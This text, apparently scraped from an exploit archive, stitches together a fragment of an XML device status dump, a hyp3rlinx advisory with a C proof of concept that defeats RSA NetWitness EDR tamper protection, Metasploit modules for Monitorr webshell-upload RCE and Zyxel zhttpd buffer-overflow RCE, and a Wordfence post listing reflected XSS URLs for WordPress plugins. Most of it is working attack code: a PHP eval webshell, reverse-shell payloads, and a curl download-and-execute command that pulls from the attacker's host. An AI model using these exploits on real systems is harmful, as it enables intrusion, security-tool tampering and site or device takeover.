display-primary='true' path='remote_port' title='Remote TCP port'>45158</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path=' 91FC71C' title='Client #3720'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>221.128.101.50</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>55776</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path='599CD113' title='Client #3721'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>118.175.2.50</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>60818</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path='BAB80847' title='Client #3722'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>203.114.125.67</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>53984</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> </list> </module> <module status='-1' display-primary='true' path='storage' title='Storage'> <reading status='100' display-primary='true' path='state' title='State'>Inactive</reading> <reading status='100' display-primary='true' path='recording_state' title='Recording state'>Last flush good</reading> <reading status='-1' display-primary='true' path='last_accessed' title='Last accessed'>2022-06-14T08:10:14Z</reading> <reading status='-1' display-primary='true' path='free_space_pct' title='Free space'>27.2%</reading> <reading status='-1' display-primary='false' path='free_space' units='bytes' title='Available space'>17449811968</reading> <reading status='-1' display-primary='true' path='size' units='bytes' title='Storage size'>64134021120</reading> <reading status='100' display-primary='false' path='fs_type' title='Filesystem type'>VFAT</reading> <list status='-1' display-primary='false' path='clients' title='Clients'> </list> </module> <module status='-1' display-primary='true' path='system' title='Linux system'> <reading status='-1' display-primary='false' path='serial_number' title='Serial number'>DAS-405D62</reading> <reading status='-1' display-primary='true' path='uptime' units='s' title='System uptime'>10307538</reading> <reading status='-1' display-primary='true' path='load_average' title='Load Average'>1.72</reading> <reading status='100' display-primary='true' path='root_free_space' units='bytes' title='Root filesystem free space'>437809152</reading> <reading status='100' display-primary='true' path='root_percent_free_space' title='Root filesystem percentage space free'>77.0%</reading> <reading status='-1' display-primary='true' path='build_label' title='Software repository label'>&example;</reading> <reading status='-1' display-primary='true' path='build_version' title='Software build number'>15809</reading> <reading status='-1' display-primary='true' path='build_machine' title='Build machine'>CMG-DAS</reading> <reading status='-1' display-primary='true' path='last_reboot_1' title='Reboot 1'>2021-04-08T05:06:17Z</reading> <reading status='-1' display-primary='true' path='last_reboot_2' title='Reboot 2'>2021-04-08T07:02:50Z</reading> <reading status='-1' display-primary='true' path='last_reboot_3' title='Reboot 3'>2021-04-08T08:00:33Z</reading> <reading status='-1' display-primary='true' path='last_reboot_4' title='Reboot 4'>2021-04-08T08:30:41Z</reading> <reading status='-1' display-primary='true' path='last_reboot_5' title='Reboot 5'>2021-04-08T08:39:15Z</reading> <reading status='-1' display-primary='true' path='last_reboot_6' title='Reboot 6'>2021-04-08T08:46:24Z</reading> <reading status='-1' display-primary='true' path='last_reboot_7' title='Reboot 7'>2021-04-08T10:08:51Z</reading> <reading status='-1' display-primary='true' path='last_reboot_8' title='Reboot 8'>2021-04-09T07:10:41Z</reading> <reading status='-1' display-primary='true' path='last_reboot_9' title='Reboot 9'>2021-10-07T06:48:35Z</reading> <reading status='-1' display-primary='true' path='last_reboot_10' title='Reboot 10'>2022-02-15T04:14:30Z</reading> <reading status='100' display-primary='true' path='temperature' units='Â°C' title='System temperature'>43.875</reading> <reading status='100' display-primary='true' path='voltage' units='V' title='Power supply voltage'>12.75</reading> <reading status='100' display-primary='true' path='current' units='A' title='Power supply current'>0.442</reading> <reading status='100' display-primary='true' path='sensor_A_voltage' units='V' title='Sensor A voltage'>12.675</reading> <reading status='100' display-primary='true' path='sensor_A_current' units='A' title='Sensor A current'>0.289</reading> <reading status='100' display-primary='true' path='sensor_B_voltage' units='V' title='Sensor B voltage'>12.725</reading> <reading status='100' display-primary='true' path='sensor_B_current' units='A' title='Sensor B current'>0.002</reading> </module> </xml-status> ``` </code></pre>

<pre><code>[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Security www.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References] https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C 1) Install "RSA NetWitness.msi" (Endpoint EDR Agent) 2) Run Exploit PoC as a Standard non-admin user, the PoC will: a) Open a handle (copy) to Ecat002 event. b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group. c) Set/Reset event the Ecat002 handle. d) if admin privs change the EDR service configuration Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln. */ char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"}; BOOL PWNED=FALSE; void Exploit(); int AdminChl(); void HijackSvcConfig(); int main(void){ printf("[+] RSA NetWitness EDR Agent 0Day\n"); printf("[+] CVE-2022-47529\n"); printf("[+] Discovery: John Page (aka hyp3rlinx)\n"); printf("[+] ===================================\n"); Exploit(); if( AdminChk() ){ printf("[+] Hijacked NetWitness Agent Service!\n"); HijackSvcConfig(); } Sleep(2000); printf("[+] Done!\n\n"); system("pause"); return 0; } void Exploit(){ PACL pOldDACL = NULL; PACL pNewDACL = NULL; HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002"); int i=0; for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){ HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]); if(hEvent != INVALID_HANDLE_VALUE){ printf("[-] Targeting Event: %s\n", Vuln_Events[i]); Sleep(500); if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){ TRUSTEE trustee[1]; trustee[0].TrusteeForm = TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); } if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); }else{ SetEvent(hEvent_Ecat002); Sleep(1000); ResetEvent(hEvent_Ecat002); CloseHandle(hEvent_Ecat002); SetEvent(hEvent); Sleep(1000); PWNED=TRUE; } if(PWNED){ LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hEvent); } Sleep(1000); } } } } //If run as admin, modify the agent service config to run our own code. int AdminChk(){ int result = 0; HANDLE hToken = NULL; if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){ TOKEN_ELEVATION elevated; DWORD tokSize = sizeof(TOKEN_ELEVATION); if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){ result = elevated.TokenIsElevated; } } if(hToken){ CloseHandle(hToken); } return result; } //Trivial example modify the service config... void HijackSvcConfig(){ Sleep(1000); WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0); } [POC Video URL] https://www.youtube.com/watch?v=kO1fu4IOlSs [Disclosure Timeline] Vendor Notification: December 2, 2022 CVE assigned: December 19, 2022 Hotfix v12.1.0.1: January 3, 2023 Fixed in v12.2.0.0 January 4, 2023 Restested for vendor: January 6, 2023 March 24, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Monitorr unauthenticated Remote Code Execution (RCE)', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability and achieving an RCE in the Monitorr application. Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation. Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges under which the web services run (typically user www-data). Monitorr 1.7.6m, 1.7.7d and below are affected. }, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module 'Lyhins Lab' # discovery ], 'References' => [ [ 'CVE', '2020-28871' ], [ 'URL', 'https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/' ], [ 'URL', 'https://attackerkb.com/topics/UNlzoDVL3o/cve-2020-28871' ], [ 'EDB', '48980' ], [ 'PACKETSTORM', '163263' ], [ 'PACKETSTORM', '170974' ] ], 'License' => MSF_LICENSE, 'Platform' => [ 'unix', 'linux', 'win', 'php' ], 'Privileged' => false, 'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ], 'Targets' => [ [ 'PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Type' => :php, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ], [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' } } ], [ 'Windows EXE Dropper', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2020-11-16', 'DefaultOptions' => { 'SSL' => false, 'RPORT' => 80 }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options( [ OptString.new('TARGETURI', [ true, 'The Monitorr endpoint URL', '/' ]), OptString.new('WEBSHELL', [ false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', '' ]), OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0]) ] ) end def upload_php_code(payload) # Upload webshell hidden in a GIF with Metasploit payload code # randomize file name if option WEBSHELL is not set. Use lowercase characters because upload stores file name in lowercase if datastore['WEBSHELL'].blank? @webshell_name = "#{Rex::Text.rand_text_alpha_lower(8..16)}.php" else @webshell_name = datastore['WEBSHELL'].to_s.downcase end # construct multipart form data form_data = Rex::MIME::Message.new form_data.add_part(payload.prepend("GIF89a#{rand_text_numeric(6..8)}"), 'image/gif', 'binary', "form-data; name=\"fileToUpload\"; filename=\"#{@webshell_name}\"") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'assets', 'php', 'upload.php'), 'ctype' => "multipart/form-data; boundary=#{form_data.bound}", 'data' => form_data.to_s }) return false unless res && res.code == 200 && !res.body.blank? # parse HTML response to find the id with value 'uploadok' that indicates a successful upload html = res.get_html_document !!html.at('div[@id="uploadok"]') end def execute_command(cmd, _opts = {}) payload = Base64.strict_encode64(cmd) php_cmd_function = Base64.strict_encode64(datastore['COMMAND']) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'assets', 'data', 'usrimg', @webshell_name), 'ctype' => 'application/x-www-form-urlencoded', 'vars_get' => { @get_param => php_cmd_function }, 'vars_post' => { @post_param => payload } }) end def execute_php(cmd, _opts = {}) payload = Base64.strict_encode64(cmd) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'assets', 'data', 'usrimg', @webshell_name), 'ctype' => 'application/x-www-form-urlencoded', 'vars_post' => { @post_param => payload } }) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'assets', 'js', 'version', 'version.txt'), 'ctype' => 'application/x-www-form-urlencoded' }) if res && res.code == 200 && !res.body.blank? # version 0.8.6d is the first release where versioning using version.txt is introduced according the release notes. version = Rex::Version.new(res.body) return CheckCode::Vulnerable("Monitorr version: #{version}") if version.between?(Rex::Version.new('0.8.6'), Rex::Version.new('1.7.7')) end CheckCode::Unknown end def exploit # select webshell depending on the target setting (PHP or others). # randomize and encode all parameters to obfuscate the payload and execution @post_param = Rex::Text.rand_text_alphanumeric(1..8) @get_param = Rex::Text.rand_text_alphanumeric(1..8) if target['Type'] == :php @webshell = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>" else @webshell = "<?=base64_decode($_GET[\'#{@get_param}\'])(base64_decode($_POST[\'#{@post_param}\']));?>" end print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed, the system is likely patched.") unless upload_php_code(@webshell) register_file_for_cleanup(@webshell_name.to_s) case target['Type'] when :php execute_php(payload.encoded) when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager(linemax: 65536) when :windows_command execute_command(payload.encoded) when :windows_dropper execute_cmdstager(flavor: :psh_invokewebrequest, linemax: 65536) end end end </code></pre>

<pre><code>Description: Reflected Cross-Site Scripting Affected Plugin: Watu Quiz Plugin Slug: watu Affected Versions: <= 3.3.9 CVE ID: CVE-2023-0968 CVSS Score: 6.1 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Researcher/s: Marco Wotschka Fully Patched Version: 3.3.9.1 Description: Reflected Cross-Site Scripting Affected Plugin: GN Publisher: Google News Compatible RSS Feeds Plugin Slug: gn-publisher Affected Versions: <= 1.5.5 CVE ID: CVE-2023-1080 CVSS Score: 6.1 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Researcher/s: Marco Wotschka Fully Patched Version: 1.5.6 Description: Reflected Cross-Site Scripting Affected Plugin: Japanized For WooCommerce Plugin Slug: woocommerce-for-japan Affected Versions: <= 2.5.4 CVE ID: CVE-2023-0942 CVSS Score: 6.1 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Researcher/s: Marco Wotschka Fully Patched Version: 2.5.5 Vulnerability Details Watu Quiz is a plugin that offers site owners the ability to create exams, quizzes and surveys. It allows administrators to review quiz submissions and filter search results by username, email, date taken and quiz score. Unfortunately, the search terms – provided as URL parameters – were not properly sanitized before being echoed on the search form. Visiting a URL containing a malicious payload sufficed to trigger the execution of malicious JavaScript code in the context of the visiting user’s session. Since the exploitable page was an administrative page, this code could be used to create new administrator users or to perform other similarly severe actions potentially resulting in site takeover. A vulnerable line of code in the plugin used the user-provided parameter and output it directly: <input name="dn" type="text" value="<?php echo @$_GET['dn']?>" /> The dn parameter can be used to close out the value attribute, add an onmouseover event (or an onfocus event combined with the autofocus attribute) and execute JavaScript in the context of the victim’s browser. /wp-admin/admin.php?page=watu_takings&exam_id=1&dn="%2Fonmouseover%3Dalert(123)%2F%2F Versions up to 3.3.9 of this plugin are vulnerable. The issue is fixed in version 3.3.9.1 as of March 3, 2023. GN Publisher is a plugin that makes RSS feeds which comply with Google News RSS feed technical requirements – necessary for inclusion in the Google News Publisher Center. The plugin addresses some common RSS compatibility issues publishers typically experience. On its main configuration page It offers a tabbed form where administrators can change plugin-specific settings. However, the plugin does not properly escape the tab name before outputting it. The software features a button in the top right corner that offers an upgrade to the PRO version. The code for the button in the vulnerable version is shown below (slightly reformatted for legibility): As can be seen, the button element contains a php echo statement that outputs the tab parameter as a button class attribute. An unauthenticated attacker can take advantage of this and inject attribute-based JavaScript that executes on an event of the attacker’s choosing such as onmouseover, or onfocus in combination with autofocus, assuming they can also successfully trick a site administrator into performing an action. /wp-admin/options-general.php?page=gn-publisher-settings&tab=hans%22%2F+onmouseover%3Dalert%281%29%3B%2F%2F Versions up to, and including, 1.5.5 are vulnerable. Version 1.5.6 addressed this issue and was released on February 24, 2023. The plugin Japanized for WooCommerce adds additional features to WooCommerce that make it more user-friendly for a Japanese audience, such as honorific titles and custom payment options geared towards the Japanese market. Similarly to the other two plugins discussed above, Japanized for WooCommerce outputs unsanitized user input provided via URL parameter. As long as a tab parameter is provided, it will be output as part of the provided JavaScript that follows. A malicious piece of code can be used to close the script tag, open a new one, and include code to be executed on behalf of the visiting user. /wp-admin/admin.php?page=wc4jp-options&tab=hans%27%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E Just like the other two vulnerabilities discussed above, this vulnerability can be exploited by unauthenticated attackers as long as an administrator of a vulnerable site can be tricked into performing an action such as clicking on a link leading them to the vulnerable form. This issue is patched as of version 2.5.6, which was released on February 28, 2023. As a final reminder, as is typical for Reflected Cross-Site Scripting vulnerabilities, these attacks can be carried out by unauthenticated users. However, the interaction of a site user is a requirement. Furthermore, the malicious injection does not persist as it is not stored in the database. Conclusion In today’s post, we detailed flaws in three plugins that made it possible for attackers to inject malicious JavaScript into a vulnerable site. While the exploitation of these vulnerabilities requires some degree of social engineering, they all could be used for site takeover. All Wordfence users, including those running Wordfence Premium, Wordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against this vulnerability. If you believe your site has been compromised as a result of these vulnerabilities or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance. If you have any friends or colleagues who are using one of these plugins, please share this announcement with them and encourage them to update to the latest version as soon as possible. If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Zyxel Unauthenticated LAN Remote Code Execution', 'Description' => %q{ This module exploits a buffer overflow in the zhttpd binary (/bin/zhttpd). It is present on more than 40 Zyxel routers and CPE devices. The code execution vulnerability can only be exploited by an attacker if the zhttp webserver is reachable. No authentication is required. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host. }, 'License' => MSF_LICENSE, 'Author' => [ 'Steffen Robertz <s.robertz[at]sec-consult.com>', 'Gerhard Hechenberger <g.hechenberger[at]sec-consult.com>', 'Thomas Weber <t.weber[at]sec-consult.com>', 'Stefan Viehboeck <v.viehboeck[at]sec-consult.com>', 'SEC Consult Vulnerability Lab' ], 'References' => [ [ 'URL', 'https://r.sec-consult.com/zyxsploit'], ], 'Privileged' => true, 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Payload' => {}, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'WfsDelay' => 15 }, 'Targets' => [ [ 'Zyxel Device', {} ] ], 'DisclosureDate' => '2022-02-01', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SERVICE_RESTARTS], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(80) ] ) register_advanced_options( [ OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 7200]) ] ) end def check res = send_request_raw({ 'uri' => '/Export_Log?/etc/passwd', 'method' => 'GET', 'rport' => datastore['RPORT'] }) return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return CheckCode::Vulnerable if res.to_s['root:x:0:0:'] return CheckCode::Safe end # Handle incoming requests from the router def on_request_uri(cli, _request) if !@payload_sent print_good("#{peer} - Sending executable to the router") print_good("#{peer} - A shell should connect soon!") send_response(cli, @payload_exe) @payload_sent = true end end def build_buffer_overflow_url(download_cmd) libc_addr = 0xb6a38000 system_offset = 0x000376c8 system_addr = libc_addr + system_offset mov_offset = 0x000f4ccc mov_addr = libc_addr + mov_offset r3_offset = 0x0010bdac r3_addr = libc_addr + r3_offset sp_inc_offset = 0x000f70ec sp_inc_addr = libc_addr + sp_inc_offset overflow_url = rand_text_alpha_lower(268) overflow_url += [r3_addr].pack('I') overflow_url += rand_text_alpha_lower(12) overflow_url += [sp_inc_addr].pack('I') overflow_url += [mov_addr].pack('I') overflow_url += rand_text_alpha_lower(4) overflow_url += [system_addr].pack('I') overflow_url += rand_text_alpha_lower(24) overflow_url += download_cmd return overflow_url end def send_exploit(exploit_url) send_request_raw({ 'uri' => "/Export_Log?#{exploit_url}", 'method' => 'GET', 'rport' => datastore['RPORT'] }) Rex.sleep(6) end def exploit if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST") end print_status("Attempting to exploit #{target.name}") srv_host = datastore['SRVHOST'] srv_port = datastore['SRVPORT'] @cmd_file = rand_text_alpha_lower(1) payload_file = rand_text_alpha_lower(1) # generate our payload executable @payload_exe = generate_payload_exe # Command that will download @payload_exe and execute it download_cmd = 'curl${IFS}' if datastore['SSL'] # https:// can't be a substring as the zyxel parser won't be able to understand the URI download_cmd += '-k${IFS}https:`echo${IFS}//`' end download_cmd += "#{srv_host}:#{srv_port}/#{payload_file}${IFS}-o${IFS}/tmp/#{payload_file};chmod${IFS}+x${IFS}/tmp/#{payload_file};/tmp/#{payload_file};" http_service = "#{srv_host}:#{srv_port}" print_status("Starting up our web service on #{http_service} ...") start_service({ 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => "/#{payload_file}" } }) print_status('Going to bruteforce ASLR, this might take a while...') count = 1 exploit_url = build_buffer_overflow_url(download_cmd) timeout = 0 until @payload_sent print_status("Trying to overflow the buffer, attempt #{count}") send_exploit(exploit_url) count += 1 timeout += 6 if timeout == datastore['MAX_WAIT'].to_i fail_with(Failure::Unknown, "#{peer} - Timeout reached! You were either very unlucky or the device is not vulnerable anymore!") end end end end </code></pre>